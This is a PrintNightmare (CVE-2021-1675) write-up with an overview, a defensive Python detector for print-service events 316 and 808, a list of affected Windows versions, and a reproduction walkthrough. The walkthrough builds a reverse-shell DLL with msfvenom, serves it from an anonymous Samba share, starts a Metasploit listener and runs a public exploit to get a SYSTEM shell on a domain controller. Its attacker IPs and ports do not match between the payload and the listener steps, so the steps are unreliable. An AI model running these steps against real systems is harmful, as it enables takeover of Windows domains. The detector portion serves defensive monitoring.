Vulnerability overview
The Microsoft Windows Print Spooler service fails to restrict access to the RpcAddPrinterDriverEx() function, which may allow a remote authenticated attacker to execute arbitrary code with SYSTEM privileges on a vulnerable system. RpcAddPrinterDriverEx() is used to install a printer driver on the system. One of its parameters is a DRIVER_CONTAINER object, which holds information about which driver the added printer will use. Another parameter, dwFileCopyFlags, specifies how replacement printer driver files are copied. An attacker can exploit the fact that any authenticated user is allowed to call RpcAddPrinterDriverEx() and specify a driver file located on a remote server. As a result, the Print Spooler service (spoolsv.exe) executes the code in an arbitrary DLL with SYSTEM privileges.
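The mechanism above leaves a distinctive trace on the target: a driver installed through RpcAddPrinterDriverEx() from a remote share is recorded in the Microsoft-Windows-PrintService/Operational log as event 316 ("Printer driver ... was added or updated") whose file list contains a UNC path, and a later failure to load the dropped module shows up as event 808 ("The print spooler failed to load a plug-in module ..."). The following Python script is an added defensive example, not part of the original post and not code from the impacket or cube0x0 projects. The event records it scans are constructed samples; the exact message layout of events 316 and 808 and the `old\N` subdirectory heuristic used for event 808 are assumptions about how those events are formatted.

```python
"""Heuristic detector for suspicious printer-driver installs.

Scans records shaped like Microsoft-Windows-PrintService/Operational
events 316 (driver added or updated) and 808 (plug-in module failed to
load) and flags the patterns a remote-driver install leaves behind.
Message layouts are assumed from the Windows event templates; all
sample records below are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class PrintEvent:
    event_id: int
    computer: str
    message: str


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Benign: a built-in driver installed from the local driver store.
    PrintEvent(316, "dc01",
               "Printer driver Generic / Text Only for Windows x64 was added or updated. "
               "Files:- C:\\Windows\\System32\\spool\\DRIVERS\\x64\\3\\unidrv.dll, "
               "C:\\Windows\\System32\\spool\\DRIVERS\\x64\\3\\unidrv.hlp. "
               "No user action is required."),
    # Suspicious: the driver's first file is pulled from a remote SMB share.
    PrintEvent(316, "dc01",
               "Printer driver 1234 for Windows x64 was added or updated. "
               "Files:- \\\\192.168.56.130\\smb\\reverse.dll, UNIDRV.DLL, kernelbase.dll. "
               "No user action is required."),
    # Suspicious: spooler failed to load a module from an old\N driver subdirectory.
    PrintEvent(808, "dc01",
               "The print spooler failed to load a plug-in module "
               "C:\\Windows\\system32\\spool\\DRIVERS\\x64\\3\\old\\1\\reverse.dll, "
               "error code 0x45A. See the event user data for context information."),
    # Unrelated event ID, should be ignored.
    PrintEvent(307, "dc01", "Document 12, Print Document owned by alice was printed."),
]

# "Files:- a, b, c. No user action is required." -> capture "a, b, c"
FILES_RE = re.compile(r"Files:-\s*(?P<files>.*?)\.\s*No user action", re.S)
# "... plug-in module <path>, error code ..." -> capture <path>
MODULE_RE = re.compile(r"plug-in module\s+(?P<path>.+?),\s*error code")
# Driver staging directory of the form ...\spool\DRIVERS\<arch>\<ver>\old\<N>\ (assumed heuristic)
OLD_DIR_RE = re.compile(r"\\spool\\drivers\\.*\\old\\", re.I)


def driver_files(message: str) -> List[str]:
    """Return the list of driver files named in an event 316 message."""
    m = FILES_RE.search(message)
    if not m:
        return []
    return [f.strip() for f in m.group("files").split(",") if f.strip()]


def is_unc(path: str) -> bool:
    """True for \\\\server\\share\\... paths, i.e. files sourced over SMB."""
    return path.startswith("\\\\")


def analyse(event: PrintEvent) -> List[str]:
    """Return human-readable reasons an event looks suspicious (empty if benign)."""
    reasons = []
    if event.event_id == 316:
        for f in driver_files(event.message):
            if is_unc(f):
                reasons.append(f"driver file sourced from remote share: {f}")
    elif event.event_id == 808:
        m = MODULE_RE.search(event.message)
        if m and OLD_DIR_RE.search(m.group("path")):
            reasons.append(f"spooler tried to load module from driver staging dir: {m.group('path')}")
    return reasons


def scan(events: List[PrintEvent]) -> List[Tuple[str, int, str]]:
    """Run analyse() over a batch and return (computer, event_id, reason) findings."""
    return [(e.computer, e.event_id, r) for e in events for r in analyse(e)]


if __name__ == "__main__":
    for computer, event_id, reason in scan(SAMPLE_EVENTS):
        print(f"[{computer}] event {event_id}: {reason}")
```

The Operational log for PrintService is not enabled by default, so this only yields results on hosts where it has been turned on or where its records are forwarded to a central log store; on a domain controller, which the walkthrough below targets, a UNC path in an event 316 file list is worth treating as a high-priority finding.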
Affected versions
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Tools
PoC: GitHub - cube0x0/impacket: Impacket is a collection of Python classes for working with network protocols.
Exp: https://github.com/cube0x0/CVE-2021-1675
Attack machine: Kali 2022
Target machine: Windows Server 2016
Reproduction
(1) Create a new user in the domain
(2) Run net user at the command prompt to check that the user was added successfully
(3) Run net user wuhu to view the user's details
(4) Start the Print Spooler service
(5) Install the PoC on Kali
cd impacket
python3 ./setup.py install
(6) Enable anonymous SMB access
vim /etc/samba/smb.conf
Append force user = nobody at the end of smb.conf
(7) After configuring, start smbd
service smbd start
(8) Check that the share can be connected to
(9) In the shared tmp directory, generate a .dll trojan with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll
LHOST is Kali's IP and LPORT is set to 9999; the generated reverse-shell DLL is placed in the tmp folder
(10) Start a listener with msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.130 (Kali's IP address)
set lport 443
(11) Run the exploit with the EXP
python3 CVE-2021-1675.py username:password@192.168.56.136 '\\192.168.56.130\smb\reverse.dll'
The reverse shell comes back with SYSTEM privileges on the domain controller; exploitation succeeded